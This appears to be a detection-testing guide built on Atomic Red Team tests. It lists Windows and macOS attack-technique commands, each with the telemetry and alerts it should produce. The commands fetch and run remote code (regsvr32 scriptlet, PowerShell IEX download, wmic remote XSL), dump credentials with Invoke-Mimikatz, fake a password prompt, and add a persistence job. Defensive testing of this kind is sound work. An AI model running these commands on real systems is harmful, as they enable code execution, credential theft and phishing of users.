3 steps to test your defenses in minutes
Windows
Regsvr32
Run this:
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
And you can expect this:
Useful Telemetry:
- Process monitoring (regsvr32.exe)
- Network connection (regsvr32.exe establishing a network connection and the presence of a URL)
- Module load (scrobj.dll)
Detection:
Alerting based on suspicious behavior.
Credential Dumping
Run this:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCr"
And you can expect this:
Useful Telemetry:
- Process monitoring (powershell.exe)
- Process command line (“DownloadString”, “WebClient”, and the presence of a URL)
- Network connection (powershell.exe establishing an external network connection)
Detection:
Alerting based on PowerShell command line and download.
XSL Script Processing
Run this:
wmic.exe process list /FORMAT:”https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl”
And you can expect this:
Useful Telemetry:
- Process monitoring (wmic.exe)
- Process command line (“/FORMAT”, url on command line)
- Network connection (wmic.exe establishing a network connection to remote resource)
Detection:
Alerting based on WMIC suspicious usage.
macOS
Input Prompt
Run this:
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
And you can expect this:
Useful Telemetry:
- Process monitoring (osascript)
- Process command line (command line usage of -e, “password”, “tell app” )
Detection:
Alert on keywords via command line and baseline osascript usage.
Launchctl
Run this:
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
And you can expect this:
Useful Telemetry:
- Process monitoring (launchctl)
Detection:
Baseline usage of launchctl and alert on new (submit) usage
2: Review
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
- Were any of your actions detected?
- Were any of your actions blocked or prevented?
- Were your actions visible in logs or other defensive telemetry?
These are just a few of the questions you can ask. And because test execution is fast, the majority of your time can be spent where it is most valuable: Reviewing the results of your tests, improving your understanding of the environment and controls, and making improvements.
3: Repeat
Once you’ve made any changes or addressed gaps in your detection coverage, repeat the process to ensure coverage, expanding out from these techniques into others that you know to be relevant based on threat intelligence, baselining, or the recommendations of others.